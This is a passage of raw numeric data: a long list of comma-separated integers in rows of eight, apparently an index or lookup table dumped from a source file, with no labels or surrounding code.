3124, 5351, 5396, 5432, 5460, 5481, 5496, 5506,
3179, 3216, 3217, 3218, 3219, 3220, 3221, 3222,
3223, 271, 275, 2204, 276, 2205, 2215, 277,
2206, 2216, 2225, 278, 2207, 2217, 2226, 2234,
279, 2208, 2218, 2227, 2235, 2242, 280, 2209,
2219, 2228, 2236, 2243, 2249, 281, 2210, 2220,
2229, 2237, 2244, 2250, 2255, 282, 2211, 2221,
2230, 2238, 2245, 2251, 2256, 2260, 283, 119,
120, 121, 122, 123, 124, 125, 126, 127,
20, 1618, 2476, 1684, 32, 1628, 3333, 3553,
1694, 2487, 3773, 2608, 1750, 1760, 44, 1637,
3342, 3562, 1703, 3387, 6191, 3607, 3782, 3827,
1769, 2498, 3993, 2619, 4002, 4047, 2729, 1816,
1826, 1835, 56, 1645, 3350, 3570, 1711, 3395,
6199, 3615, 3790, 3835, 1777, 3431, 6235, 3651,
6355, 6683, 3871, 4010, 4055, 4091, 1843, 2509,
4213, 2630, 4222, 4267, 2740, 4230, 4275, 4311,
2839, 1882, 1892, 1901, 1909, 68, 1652, 3357,
3577, 1718, 3402, 6206, 3622, 3797, 3842, 1784,
3438, 6242, 3658, 6362, 6690, 3878, 4017, 4062,
4098, 1850, 3466, 6270, 3686, 6390, 6718, 3906,
6474, 6802, 7011, 4126, 4237, 4282, 4318, 4346,
1916, 2520, 4433, 2641, 4442, 4487, 2751, 4450,
4495, 4531, 2850, 4457, 4502, 4538, 4566, 2938,
1948, 1958, 1967, 1975, 1982, 80, 1658, 3363,
3583, 1724, 3408, 6212, 3628, 3803, 3848, 1790,
3444, 6248, 3664, 6368, 6696, 3884, 4023, 4068,
4104, 1856, 3472, 6276, 3692, 6396, 6724, 3912,
6480, 6808, 7017, 4132, 4243, 4288, 4324, 4352,
1922, 3493, 6297, 3713, 6417, 6745, 3933, 6501,
6829, 7038, 4153, 6557, 6885, 7094, 7219, 4373,
4463, 4508, 4544, 4572, 4593, 1988, 2531, 4653,
2652, 4662, 4707, 2762, 4670, 4715, 4751, 2861,
4677, 4722, 4758, 4786, 2949, 4683, 4728, 4764,
4792, 4813, 3026, 2014, 2024, 2033, 2041, 2048,
2054, 92, 1663, 3368, 3588, 1729, 3413, 6217,
3633, 3808, 3853, 1795, 3449, 6253, 3669, 6373,
6701, 3889, 4028, 4073, 4109, 1861, 3477, 6281,
3697, 6401, 6729, 3917, 6485, 6813, 7022, 4137,
4248, 4293, 4329, 4357, 1927, 3498, 6302, 3718,
6422, 6750, 3938, 6506, 6834, 7043, 4158, 6562,
6890, 7099, 7224, 4378, 4468, 4513, 4549, 4577,
4598, 1993, 3513, 6317, 3733, 6437, 6765, 3953,
6521, 6849, 7058, 4173, 6577, 6905, 7114, 7239,
4393, 6612, 6940, 7149, 7274, 7343, 4613, 4688,
4733, 4769, 4797, 4818, 4833, 2059, 2542, 4873,
2663, 4882, 4927, 2773, 4890, 4935, 4971, 2872,
4897, 4942, 4978, 5006, 2960, 4903, 4948, 4984,
5012, 5033, 3037, 4908, 4953, 4989, 5017, 5038,
5053, 3103, 2080, 2090, 2099, 2107, 2114, 2120,
2125, 104, 1667, 3372, 3592, 1733, 3417, 6221,
3637, 3812, 3857, 1799, 3453, 6257, 3673, 6377,
6705, 3893, 4032, 4077, 4113, 1865, 3481, 6285,
3701, 6405, 6733, 3921, 6489, 6817, 7026, 4141,
4252, 4297, 4333, 4361, 1931, 3502, 6306, 3722,
6426, 6754, 3942, 6510, 6838, 7047, 4162, 6566,
6894, 7103, 7228, 4382, 4472, 4517, 4553, 4581,
4602, 1997, 3517, 6321, 3737, 6441, 6769, 3957,
6525, 6853, 7062, 4177, 6581, 6909, 7118, 7243,
4397, 6616, 6944, 7153, 7278, 7347, 4617, 4692,
4737, 4773, 4801, 4822, 4837, 2063, 3527, 6331,
3747, 6451, 6779, 3967, 6535, 6863, 7072, 4187,
6591, 6919, 7128, 7253, 4407, 6626, 6954, 7163,
7288, 7357, 4627, 6646, 6974, 7183, 7308, 7377,
7411, 4847, 4912, 4957, 4993, 5021, 5042, 5057,
5067, 2129, 2553, 5093, 2674, 5102, 5147, 2784,
5110, 5155, 5191, 2883, 5117, 5162, 5198, 5226,
2971, 5123, 5168, 5204, 5232, 5253, 3048, 5128,
5173, 5209, 5237, 5258, 5273, 3114, 5132, 5177,
5213, 5241, 5262, 5277, 5287, 3169, 2146, 2156,
2165, 2173, 2180, 2186, 2191, 2195, 116, 1670,
3375, 3595, 1736, 3420, 6224, 3640, 3815, 3860,
1802, 3456, 6260, 3676, 6380, 6708, 3896, 4035,
4080, 4116, 1868, 3484, 6288, 3704, 6408, 6736,
3924, 6492, 6820, 7029, 4144, 4255, 4300, 4336,
4364, 1934, 3505, 6309, 3725, 6429, 6757, 3945,
6513, 6841, 7050, 4165, 6569, 6897, 7106, 7231,
4385, 4475, 4520, 4556, 4584, 4605, 2000, 3520,
6324, 3740, 6444, 6772, 3960, 6528, 6856, 7065,
4180, 6584, 6912, 7121, 7246, 4400, 6619, 6947,
7156, 7281, 7350, 4620, 4695, 4740, 4776, 4804,
4825, 4840, 2066, 3530, 6334, 3750, 6454, 6782,
3970, 6538, 6866, 7075, 4190, 6594, 6922, 7131,
7256, 4410, 6629, 6957, 7166, 7291, 7360, 4630,
6649, 6977, 7186, 7311, 7380, 7414, 4850, 4915,
4960, 4996, 5024, 5045, 5060, 5070, 2132, 3536,
6340, 3756, 6460, 6788, 3976, 6544, 6872, 7081,
4196, 6600, 6928, 7137, 7262, 4416, 6635, 6963,
7172, 7297, 7366, 4636, 6655, 6983, 7192, 7317,
7386, 7420, 4856, 6665, 6993, 7202, 7327, 7396,
7430, 1606, 5076, 5135, 5180, 5216, 5244, 5265,
5280, 5290, 5296, 2198, 2564, 5313, 2685, 5322,
5367, 2795, 5330, 5375, 5411, 2894, 5337, 5382,
5418, 5446, 2982, 5343, 5388, 5424, 5452, 5473,
3059, 5348, 5393, 5429, 5457, 5478, 5493, 3125,
5352, 5397, 5433, 5461, 5482, 5497, 5507, 3180,
5355, 5400, 5436, 5464, 5485, 5500, 5510, 5516,
3224, 2212, 2222, 2231, 2239, 2246, 2252, 2257,
2261, 2264, 128, 176, 2567, 2688, 188, 2568,
5526, 2689, 2798, 2799, 200, 2569, 5527, 2690,
5536, 5581, 2800, 2897, 2898, 2899, 212, 2570,
5528, 2691, 5537, 5582, 2801, 5545, 5590, 5626,
2900, 2985, 2986, 2987, 2988, 224, 2571, 5529,
2692, 5538, 5583, 2802, 5546, 5591, 5627, 2901,
5553, 5598, 5634, 5662, 2989, 3062, 3063, 3064,
3065, 3066, 236, 2572, 5530, 2693, 5539, 5584,
2803, 5547, 5592, 5628, 2902, 5554, 5599, 5635,
5663, 2990, 5560, 5605, 5641, 5669, 5690, 3067,
3128, 3129, 3130, 3131, 3132, 3133, 248, 2573,
5531, 2694, 5540, 5585, 2804, 5548, 5593, 5629,
2903, 5555, 5600, 5636, 5664, 2991, 5561, 5606,
5642, 5670, 5691, 3068, 5566, 5611, 5647, 5675,
5696, 5711, 3134, 3183, 3184, 3185, 3186, 3187,
3188, 3189, 260, 2574, 5532, 2695, 5541, 5586,
2805, 5549, 5594, 5630, 2904, 5556, 5601, 5637,
5665, 2992, 5562, 5607, 5643, 5671, 5692, 3069,
5567, 5612, 5648, 5676, 5697, 5712, 3135, 5571,
5616, 5652, 5680, 5701, 5716, 5726, 3190, 3227,
3228, 3229, 3230, 3231, 3232, 3233, 3234, 272,
2575, 5533, 2696, 5542, 5587, 2806, 5550, 5595,
5631, 2905, 5557, 5602, 5638, 5666, 2993, 5563,
5608, 5644, 5672, 5693, 3070, 5568, 5613, 5649,
5677, 5698, 5713, 3136, 5572, 5617, 5653, 5681,
5702, 5717, 5727, 3191, 5575, 5620, 5656, 5684,
5705, 5720, 5730, 5736, 3235, 3260, 3261, 3262,
3263, 3264, 3265, 3266, 3267, 3268, 284, 287,
2270, 288, 2271, 2281, 289, 2272, 2282, 2291,
290, 2273, 2283, 2292, 2300, 291, 2274, 2284,
2293, 2301, 2308, 292, 2275, 2285, 2294, 2302,
2309, 2315, 293, 2276, 2286, 2295, 2303, 2310,
2316, 2321, 294, 2277, 2287, 2296, 2304, 2311,
2317, 2322, 2326, 295, 2278, 2288, 2297, 2305,
2312, 2318, 2323, 2327, 2330, 296, 131, 132,
133, 134, 135, 136, 137, 138, 139, 140,
21, 1619, 2477, 1685, 33, 1629, 3334, 3554,
1695, 2488, 3774, 2609, 1751, 1761, 45, 1638,
3343, 3563, 1704, 3388, 6192, 3608, 3783, 3828,
1770, 2499, 3994, 2620, 4003, 4048, 2730, 1817,
1827, 1836, 57, 1646, 3351, 3571, 1712, 3396,
6200, 3616, 3791, 3836, 1778, 3432, 6236, 3652,
6356, 6684, 3872, 4011, 4056, 4092, 1844, 2510,
4214, 2631, 4223, 4268, 2741, 4231, 4276, 4312,
2840, 1883, 1893, 1902, 1910, 69, 1653, 3358,
3578, 1719, 3403, 6207, 3623, 3798, 3843, 1785,
3439, 6243, 3659, 6363, 6691, 3879, 4018, 4063,
4099, 1851, 3467, 6271, 3687, 6391, 6719, 3907,
6475, 6803, 7012, 4127, 4238, 4283, 4319, 4347,
1917, 2521, 4434, 2642, 4443, 4488, 2752, 4451,
4496, 4532, 2851, 4458, 4503, 4539, 4567, 2939,
1949, 1959, 1968, 1976, 1983, 81, 1659, 3364,
3584, 1725, 3409, 6213, 3629, 3804, 3849, 1791,
3445, 6249, 3665, 6369, 6697, 3885, 4024, 4069,
4105, 1857, 3473, 6277, 3693, 6397, 6725, 3913,
6481, 6809, 7018, 4133, 4244, 4289, 4325, 4353,
1923, 3494, 6298, 3714, 6418, 6746, 3934, 6502,
6830, 7039, 4154, 6558, 6886, 7095, 7220, 4374,
4464, 4509, 4545, 4573, 4594, 1989, 2532, 4654,
2653, 4663, 4708, 2763, 4671, 4716, 4752, 2862,
4678, 4723, 4759, 4787, 2950, 4684, 4729, 4765,
4793, 4814, 3027, 2015, 2025, 2034, 2042, 2049,
2055, 93, 1664, 3369, 3589, 1730, 3414, 6218,
3634, 3809, 3854, 1796, 3450, 6254, 3670, 6374,
6702, 3890, 4029, 4074, 4110, 1862, 3478, 6282,
3698, 6402, 6730, 3918, 6486, 6814, 7023, 4138,
4249, 4294, 4330, 4358, 1928, 3499, 6303, 3719,
6423, 6751, 3939, 6507, 6835, 7044, 4159, 6563,
6891, 7100, 7225, 4379, 4469, 4514, 4550, 4578,
4599, 1994, 3514, 6318, 3734, 6438, 6766, 3954,
6522, 6850, 7059, 4174, 6578, 6906, 7115, 7240,
4394, 6613, 6941, 7150, 7275, 7344, 4614, 4689,
4734, 4770, 4798, 4819, 4834, 2060, 2543, 4874,
2664, 4883, 4928, 2774, 4891, 4936, 4972, 2873,
4898, 4943, 4979, 5007, 2961, 4904, 4949, 4985,
5013, 5034, 3038, 4909, 4954, 4990, 5018, 5039,
5054, 3104, 2081, 2091, 2100, 2108, 2115, 2121,
2126, 105, 1668, 3373, 3593, 1734, 3418, 6222,
3638, 3813, 3858, 1800, 3454, 6258, 3674, 6378,
6706, 3894, 4033, 4078, 4114, 1866, 3482, 6286,
3702, 6406, 6734, 3922, 6490, 6818, 7027, 4142,
4253, 4298, 4334, 4362, 1932, 3503, 6307, 3723,
6427, 6755, 3943, 6511, 6839, 7048, 4163, 6567,
6895, 7104, 7229, 4383, 4473, 4518, 4554, 4582,
4603, 1998, 3518, 6322, 3738, 6442, 6770, 3958,
6526, 6854, 7063, 4178, 6582, 6910, 7119, 7244,
4398, 6617, 6945, 7154, 7279, 7348, 4618, 4693,
4738, 4774, 4802, 4823, 4838, 2064, 3528, 6332,
3748, 6452, 6780, 3968, 6536, 6864, 7073, 4188,
6592, 6920, 7129, 7254, 4408, 6627, 6955, 7164,
7289, 7358, 4628, 6647, 6975, 7184, 7309, 7378,
7412, 4848, 4913, 4958, 4994, 5022, 5043, 5058,
5068, 2130, 2554, 5094, 2675, 5103, 5148, 2785,
5111, 5156, 5192, 2884, 5118, 5163, 5199, 5227,
2972, 5124, 5169, 5205, 5233, 5254, 3049, 5129,
5174, 5210, 5238, 5259, 5274, 3115, 5133, 5178,
5214, 5242, 5263, 5278, 5288, 3170, 2147, 2157,
2166, 2174, 2181, 2187, 2192, 2196, 117, 1671,
3376, 3596, 1737, 3421, 6225, 3641, 3816, 3861,
1803, 3457, 6261, 3677, 6381, 6709, 3897, 4036,
4081, 4117, 1869, 3485, 6289, 3705, 6409, 6737,
3925, 6493, 6821, 7030, 4145, 4256, 4301, 4337,
4365, 1935, 3506, 6310, 3726, 6430, 6758, 3946,
6514, 6842, 7051, 4166, 6570, 6898, 7107, 7232,
4386, 4476, 4521, 4557, 4585, 4606, 2001, 3521,
6325, 3741, 6445, 6773, 3961, 6529, 6857, 7066,
4181, 6585, 6913, 7122, 7247, 4401, 6620, 6948,
7157, 7282, 7351, 4621, 4696, 4741, 4777, 4805,
4826, 4841, 2067, 3531, 6335, 3751, 6455, 6783,
3971, 6539, 6867, 7076, 4191, 6595, 6923, 7132,
7257, 4411, 6630, 6958, 7167, 7292, 7361, 4631,
6650, 6978, 7187, 7312, 7381, 7415, 4851, 4916,
4961, 4997, 5025, 5046, 5061, 5071, 2133, 3537,
6341, 3757, 6461, 6789, 3977, 6545, 6873, 7082,
4197, 6601, 6929, 7138, 7263, 4417, 6636, 6964,
7173, 7298, 7367, 4637, 6656, 6984, 7193, 7318,
7387, 7421, 4857, 6666, 6994, 7203, 7328, 7397,
7431, 7445, 5077, 5136, 5181, 5217, 5245, 5266,
5281, 5291, 5297, 2199, 2565, 5314, 2686, 5323,
5368, 2796, 5331, 5376, 5412, 2895, 5338, 5383,
5419, 5447, 2983, 5344, 5389, 5425, 5453, 5474,
3060, 5349, 5394, 5430, 5458, 5479, 5494, 3126,
5353, 5398, 5434, 5462, 5483, 5498, 5508, 3181,
5356, 5401, 5437, 5465, 5486, 5501, 5511, 5517,
3225, 2213, 2223, 2232, 2240, 2247, 2253, 2258,
2262, 2265, 129, 1673, 3378, 3598, 1739, 3423,
6227, 3643, 3818, 3863, 1805, 3459, 6263, 3679,
6383, 6711, 3899, 4038, 4083, 4119, 1871, 3487,
6291, 3707, 6411, 6739, 3927, 6495, 6823, 7032,
4147, 4258, 4303, 4339, 4367, 1937, 3508, 6312,
3728, 6432, 6760, 3948, 6516, 6844, 7053, 4168,
6572, 6900, 7109, 7234, 4388, 4478, 4523, 4559,
4587, 4608, 2003, 3523, 6327, 3743, 6447, 6775,
3963, 6531, 6859, 7068, 4183, 6587, 6915, 7124,
7249, 4403, 6622, 6950, 7159, 7284, 7353, 4623,
4698, 4743, 4779, 4807, 4828, 4843, 2069, 3533,
6337, 3753, 6457, 6785, 3973, 6541, 6869, 7078,
4193, 6597, 6925, 7134, 7259, 4413, 6632, 6960,
7169, 7294, 7363, 4633, 6652, 6980, 7189, 7314,
7383, 7417, 4853, 4918, 4963, 4999, 5027, 5048,
5063, 5073, 2135, 3539, 6343, 3759, 6463, 6791,
3979, 6547, 6875, 7084, 4199, 6603, 6931, 7140,
7265, 4419, 6638, 6966, 7175, 7300, 7369, 4639,
6658, 6986, 7195, 7320, 7389, 7423, 4859, 6668,
6996, 7205, 7330, 7399, 7433, 7447, 5079, 5138,
5183, 5219, 5247, 5268, 5283, 5293, 5299, 2201,
1609, 1609, 3762, 1609, 6794, 3982, 1609, 6878,
7087, 4202, 1609, 6934, 7143, 7268, 4422, 1609,
6969, 7178, 7303, 7372, 4642, 1609, 6989, 7198,
7323, 7392, 7426, 4862, 1609, 6999, 7208, 7333,
7402, 7436, 7450, 5082, 1608, 1608, 1608, 1608,
1608, 1608, 1608, 1607, 1608, 1609, 5403, 5439,
5467, 5488, 5503, 5513, 5519, 1608, 2267, 2576,
5534, 2697, 5543, 5588, 2807, 5551, 5596, 5632,
2906, 5558, 5603, 5639, 5667, 2994, 5564, 5609,
5645, 5673, 5694, 3071, 5569, 5614, 5650, 5678,
5699, 5714, 3137, 5573, 5618, 5654, 5682, 5703,
5718, 5728, 3192, 5576, 5621, 5657, 5685, 5706,
5721, 5731, 5737, 3236, 1609, 5623, 5659, 5687,
5708, 5723, 5733, 5739, 1608, 3269, 2279, 2289,
2298, 2306, 2313, 2319, 2324, 2328, 2331, 2333,
141, 177, 2578, 2699, 189, 2579, 5746, 2700,
2809, 2810, 201, 2580, 5747, 2701, 5756, 5801,
2811, 2908, 2909, 2910, 213, 2581, 5748, 2702,
5757, 5802, 2812, 5765, 5810, 5846, 2911, 2996,
2997, 2998, 2999, 225, 2582, 5749, 2703, 5758,
5803, 2813, 5766, 5811, 5847, 2912, 5773, 5818,
5854, 5882, 3000, 3073, 3074, 3075, 3076, 3077,
237, 2583, 5750, 2704, 5759, 5804, 2814, 5767,
5812, 5848, 2913, 5774, 5819, 5855, 5883, 3001,
5780, 5825, 5861, 5889, 5910, 3078, 3139, 3140,
3141, 3142, 3143, 3144, 249, 2584, 5751, 2705,
5760, 5805, 2815, 5768, 5813, 5849, 2914, 5775,
5820, 5856, 5884, 3002, 5781, 5826, 5862, 5890,
5911, 3079, 5786, 5831, 5867, 5895, 5916, 5931,
3145, 3194, 3195, 3196, 3197, 3198, 3199, 3200,
261, 2585, 5752, 2706, 5761, 5806, 2816, 5769,
5814, 5850, 2915, 5776, 5821, 5857, 5885, 3003,
5782, 5827, 5863, 5891, 5912, 3080, 5787, 5832,
5868, 5896, 5917, 5932, 3146, 5791, 5836, 5872,
5900, 5921, 5936, 5946, 3201, 3238, 3239, 3240,
3241, 3242, 3243, 3244, 3245, 273, 2586, 5753,
2707, 5762, 5807, 2817, 5770, 5815, 5851, 2916,
5777, 5822, 5858, 5886, 3004, 5783, 5828, 5864,
5892, 5913, 3081, 5788, 5833, 5869, 5897, 5918,
5933, 3147, 5792, 5837, 5873, 5901, 5922, 5937,
5947, 3202, 5795, 5840, 5876, 5904, 5925, 5940,
5950, 5956, 3246, 3271, 3272, 3273, 3274, 3275,
3276, 3277, 3278, 3279, 285, 2587, 5754, 2708,
5763, 5808, 2818, 5771, 5816, 5852, 2917, 5778,
5823, 5859, 5887, 3005, 5784, 5829, 5865, 5893,
5914, 3082, 5789, 5834, 5870, 5898, 5919, 5934,
3148, 5793, 5838, 5874, 5902, 5923, 5938, 5948,
3203, 5796, 5841, 5877, 5905, 5926, 5941, 5951,
5957, 3247, 1609, 5843, 5879, 5907, 5928, 5943,
5953, 5959, 1608, 3280, 3293, 3294, 3295, 3296,
3297, 3298, 3299, 3300, 3301, 3302, 297, 299,
2336, 300, 2337, 2347, 301, 2338, 2348, 2357,
302, 2339, 2349, 2358, 2366, 303, 2340, 2350,
2359, 2367, 2374, 304, 2341, 2351, 2360, 2368,
2375, 2381, 305, 2342, 2352, 2361, 2369, 2376,
2382, 2387, 306, 2343, 2353, 2362, 2370, 2377,
2383, 2388, 2392, 307, 2344, 2354, 2363, 2371,
2378, 2384, 2389, 2393, 2396, 308, 2345, 2355,
2364, 2372, 2379, 2385, 2390, 2394, 2397, 2399,
309, 143, 144, 145, 146, 147, 148, 149,
150, 151, 152, 153, 22, 178, 2478, 190,
34, 178, 2589, 2710, 190, 2489, 2820, 2610,
202, 202, 46, 178, 2589, 2710, 190, 2590,
5966, 2711, 2820, 2821, 202, 2500, 2919, 2621,
2919, 2920, 2731, 214, 214, 214, 58, 178,
2589, 2710, 190, 2590, 5966, 2711, 2820, 2821,
202, 2591, 5967, 2712, 5976, 6021, 2822, 2919,
2920, 2921, 214, 2511, 3007, 2632, 3007, 3008,
2742, 3007, 3008, 3009, 2841, 226, 226, 226,
226, 70, 178, 2589, 2710, 190, 2590, 5966,
2711, 2820, 2821, 202, 2591, 5967, 2712, 5976,
6021, 2822, 2919, 2920, 2921, 214, 2592, 5968,
2713, 5977, 6022, 2823, 5985, 6030, 6066, 2922,
3007, 3008, 3009, 3010, 226, 2522, 3084, 2643,
3084, 3085, 2753, 3084, 3085, 3086, 2852, 3084,
3085, 3086, 3087, 2940, 238, 238, 238, 238,
238, 82, 178, 2589, 2710, 190, 2590, 5966,
2711, 2820, 2821, 202, 2591, 5967, 2712, 5976,
6021, 2822, 2919, 2920, 2921, 214, 2592, 5968,
2713, 5977, 6022, 2823, 5985, 6030, 6066, 2922,
3007, 3008, 3009, 3010, 226, 2593, 5969, 2714,
5978, 6023, 2824, 5986, 6031, 6067, 2923, 5993,
6038, 6074, 6102, 3011, 3084, 3085, 3086, 3087,
3088, 238, 2533, 3150, 2654, 3150, 3151, 2764,
3150, 3151, 3152, 2863, 3150, 3151, 3152, 3153,
2951, 3150, 3151, 3152, 3153, 3154, 3028, 250,
250, 250, 250, 250, 250, 94, 178, 2589,
2710, 190, 2590, 5966, 2711, 2820, 2821, 202,
2591, 5967, 2712, 5976, 6021, 2822, 2919, 2920,
2921, 214, 2592, 5968, 2713, 5977, 6022, 2823,
5985, 6030, 6066, 2922, 3007, 3008, 3009, 3010,
226, 2593, 5969, 2714, 5978, 6023, 2824, 5986,
6031, 6067, 2923, 5993, 6038, 6074, 6102, 3011,
3084, 3085, 3086, 3087, 3088, 238, 2594, 5970,
2715, 5979, 6024, 2825, 5987, 6032, 6068, 2924,
5994, 6039, 6075, 6103, 3012, 6000, 6045, 6081,
6109, 6130, 3089, 3150, 3151, 3152, 3153, 3154,
3155, 250, 2544, 3205, 2665, 3205, 3206, 2775,
3205, 3206, 3207, 2874, 3205, 3206, 3207, 3208,
2962, 3205, 3206, 3207, 3208, 3209, 3039, 3205,
3206, 3207, 3208, 3209, 3210, 3105, 262, 262,
262, 262, 262, 262, 262, 106, 178, 2589,
2710, 190, 2590, 5966, 2711, 2820, 2821, 202,
2591, 5967, 2712, 5976, 6021, 2822, 2919, 2920,
2921, 214, 2592, 5968, 2713, 5977, 6022, 2823,
5985, 6030, 6066, 2922, 3007, 3008, 3009, 3010,
226, 2593, 5969, 2714, 5978, 6023, 2824, 5986,
6031, 6067, 2923, 5993, 6038, 6074, 6102, 3011,
3084, 3085, 3086, 3087, 3088, 238, 2594, 5970,
2715, 5979, 6024, 2825, 5987, 6032, 6068, 2924,
5994, 6039, 6075, 6103, 3012, 6000, 6045, 6081,
6109, 6130, 3089, 3150, 3151, 3152, 3153, 3154,
3155, 250, 2595, 5971, 2716, 5980, 6025, 2826,
5988, 6033, 6069, 2925, 5995, 6040, 6076, 6104,
3013, 6001, 6046, 6082, 6110, 6131, 3090, 6006,
6051, 6087, 6115, 6136, 6151, 3156, 3205, 3206,
3207, 3208, 3209, 3210, 3211, 262, 2555, 3249,
2676, 3249, 3250, 2786, 3249, 3250, 3251, 2885,
3249, 3250, 3251, 3252, 2973, 3249, 3250, 3251,
3252, 3253, 3050, 3249, 3250, 3251, 3252, 3253,
3254, 3116, 3249, 3250, 3251, 3252, 3253, 3254,
3255, 3171, 274, 274, 274, 274, 274, 274,
274, 274, 118, 178, 2589, 2710, 190, 2590,
5966, 2711, 2820, 2821, 202, 2591, 5967, 2712,
5976, 6021, 2822, 2919, 2920, 2921, 214, 2592,
5968, 2713, 5977, 6022, 2823, 5985, 6030, 6066,
2922, 3007, 3008, 3009, 3010, 226, 2593, 5969,
2714, 5978, 6023, 2824, 5986, 6031, 6067, 2923,
5993, 6038, 6074, 6102, 3011, 3084, 3085, 3086,
3087, 3088, 238, 2594, 5970, 2715, 5979, 6024,
2825, 5987, 6032, 6068, 2924, 5994, 6039, 6075,
6103, 3012, 6000, 6045, 6081, 6109, 6130, 3089,
3150, 3151, 3152, 3153, 3154, 3155, 250, 2595,
5971, 2716, 5980, 6025, 2826, 5988, 6033, 6069,
2925, 5995, 6040, 6076, 6104, 3013, 6001, 6046,
6082, 6110, 6131, 3090, 6006, 6051, 6087, 6115,
6136, 6151, 3156, 3205, 3206, 3207, 3208, 3209,
3210, 3211, 262, 2596, 5972, 2717, 5981, 6026,
2827, 5989, 6034, 6070, 2926, 5996, 6041, 6077,
6105, 3014, 6002, 6047, 6083, 6111, 6132, 3091,
6007, 6052, 6088, 6116, 6137, 6152, 3157, 6011,
6056, 6092, 6120, 6141, 6156, 6166, 3212, 3249,
3250, 3251, 3252, 3253, 3254, 3255, 3256, 274,
2566, 3282, 2687, 3282, 3283, 2797, 3282, 3283,
3284, 2896, 3282, 3283, 3284, 3285, 2984, 3282,
3283, 3284, 3285, 3286, 3061, 3282, 3283, 3284,
3285, 3286, 3287, 3127, 3282, 3283, 3284, 3285,
3286, 3287, 3288, 3182, 3282, 3283, 3284, 3285,
3286, 3287, 3288, 3289, 3226, 286, 286, 286,
286, 286, 286, 286, 286, 286, 130, 178,
2589, 2710, 190, 2590, 5966, 2711, 2820, 2821,
202, 2591, 5967, 2712, 5976, 6021, 2822, 2919,
2920, 2921, 214, 2592, 5968, 2713, 5977, 6022,
2823, 5985, 6030, 6066, 2922, 3007, 3008, 3009,
3010, 226, 2593, 5969, 2714, 5978, 6023, 2824,
5986, 6031, 6067, 2923, 5993, 6038, 6074, 6102,
3011, 3084, 3085, 3086, 3087, 3088, 238, 2594,
5970, 2715, 5979, 6024, 2825, 5987, 6032, 6068,
2924, 5994, 6039, 6075, 6103, 3012, 6000, 6045,
6081, 6109, 6130, 3089, 3150, 3151, 3152, 3153,
3154, 3155, 250, 2595, 5971, 2716, 5980, 6025,
2826, 5988, 6033, 6069, 2925, 5995, 6040, 6076,
6104, 3013, 6001, 6046, 6082, 6110, 6131, 3090,
6006, 6051, 6087, 6115, 6136, 6151, 3156, 3205,
3206, 3207, 3208, 3209, 3210, 3211, 262, 2596,
5972, 2717, 5981, 6026, 2827, 5989, 6034, 6070,
2926, 5996, 6041, 6077, 6105, 3014, 6002, 6047,
6083, 6111, 6132, 3091, 6007, 6052, 6088, 6116,
6137, 6152, 3157, 6011, 6056, 6092, 6120, 6141,
6156, 6166, 3212, 3249, 3250, 3251, 3252, 3253,
3254, 3255, 3256, 274, 2597, 5973, 2718, 5982,
6027, 2828, 5990, 6035, 6071, 2927, 5997, 6042,
6078, 6106, 3015, 6003, 6048, 6084, 6112, 6133,
3092, 6008, 6053, 6089, 6117, 6138, 6153, 3158,
6012, 6057, 6093, 6121, 6142, 6157, 6167, 3213,
6015, 6060, 6096, 6124, 6145, 6160, 6170, 6176,
3257, 3282, 3283, 3284, 3285, 3286, 3287, 3288,
3289, 3290, 286, 2577, 3304, 2698, 3304, 3305,
2808, 3304, 3305, 3306, 2907, 3304, 3305, 3306,
3307, 2995, 3304, 3305, 3306, 3307, 3308, 3072,
3304, 3305, 3306, 3307, 3308, 3309, 3138, 3304,
3305, 3306, 3307, 3308, 3309, 3310, 3193, 3304,
3305, 3306, 3307, 3308, 3309, 3310, 3311, 3237,
3304, 3305, 3306, 3307, 3308, 3309, 3310, 3311,
3312, 3270, 298, 298, 298, 298, 298, 298,
298, 298, 298, 298, 142, 178, 2589, 2710,
190, 2590, 5966, 2711, 2820, 2821, 202, 2591,
5967, 2712, 5976, 6021, 2822, 2919, 2920, 2921,
214, 2592, 5968, 2713, 5977, 6022, 2823, 5985,
6030, 6066, 2922, 3007, 3008, 3009, 3010, 226,
2593, 5969, 2714, 5978, 6023, 2824, 5986, 6031,
6067, 2923, 5993, 6038, 6074, 6102, 3011, 3084,
3085, 3086, 3087, 3088, 238, 2594, 5970, 2715,
5979, 6024, 2825, 5987, 6032, 6068, 2924, 5994,
6039, 6075, 6103, 3012, 6000, 6045, 6081, 6109,
6130, 3089, 3150, 3151, 3152, 3153, 3154, 3155,
250, 2595, 5971, 2716, 5980, 6025, 2826, 5988,
6033, 6069, 2925, 5995, 6040, 6076, 6104, 3013,
6001, 6046, 6082, 6110, 6131, 3090, 6006, 6051,
6087, 6115, 6136, 6151, 3156, 3205, 3206, 3207,
3208, 3209, 3210, 3211, 262, 2596, 5972, 2717,
5981, 6026, 2827, 5989, 6034, 6070, 2926, 5996,
6041, 6077, 6105, 3014, 6002, 6047, 6083, 6111,
6132, 3091, 6007, 6052, 6088, 6116, 6137, 6152,
3157, 6011, 6056, 6092, 6120, 6141, 6156, 6166,
3212, 3249, 3250, 3251, 3252, 3253, 3254, 3255,
3256, 274, 2597, 5973, 2718, 5982, 6027, 2828,
5990, 6035, 6071, 2927, 5997, 6042, 6078, 6106,
3015, 6003, 6048, 6084, 6112, 6133, 3092, 6008,
6053, 6089, 6117, 6138, 6153, 3158, 6012, 6057,
6093, 6121, 6142, 6157, 6167, 3213, 6015, 6060,
6096, 6124, 6145, 6160, 6170, 6176, 3257, 3282,
3283, 3284, 3285, 3286, 3287, 3288, 3289, 3290,
286, 2598, 5974, 2719, 5983, 6028, 2829, 5991,
6036, 6072, 2928, 5998, 6043, 6079, 6107, 3016,
6004, 6049, 6085, 6113, 6134, 3093, 6009, 6054,
6090, 6118, 6139, 6154, 3159, 6013, 6058, 6094,
6122, 6143, 6158, 6168, 3214, 6016, 6061, 6097,
6125, 6146, 6161, 6171, 6177, 3258, 1609, 6063,
6099, 6127, 6148, 6163, 6173, 6179, 1608, 3291,
3304, 3305, 3306, 3307, 3308, 3309, 3310, 3311,
3312, 3313, 298, 2588, 3315, 2709, 3315, 3316,
2819, 3315, 3316, 3317, 2918, 3315, 3316, 3317,
3318, 3006, 3315, 3316, 3317, 3318, 3319, 3083,
3315, 3316, 3317, 3318, 3319, 3320, 3149, 3315,
3316, 3317, 3318, 3319, 3320, 3321, 3204, 3315,
3316, 3317, 3318, 3319, 3320, 3321, 3322, 3248,
3315, 3316, 3317, 3318, 3319, 3320, 3321, 3322,
3323, 3281, 3315, 3316, 3317, 3318, 3319, 3320,
3321, 3322, 3323, 3324, 3303, 310, 310, 310,
310, 310, 310, 310, 310, 310, 310, 310,
154, 178, 311, 312, 190, 311, 2402, 312,
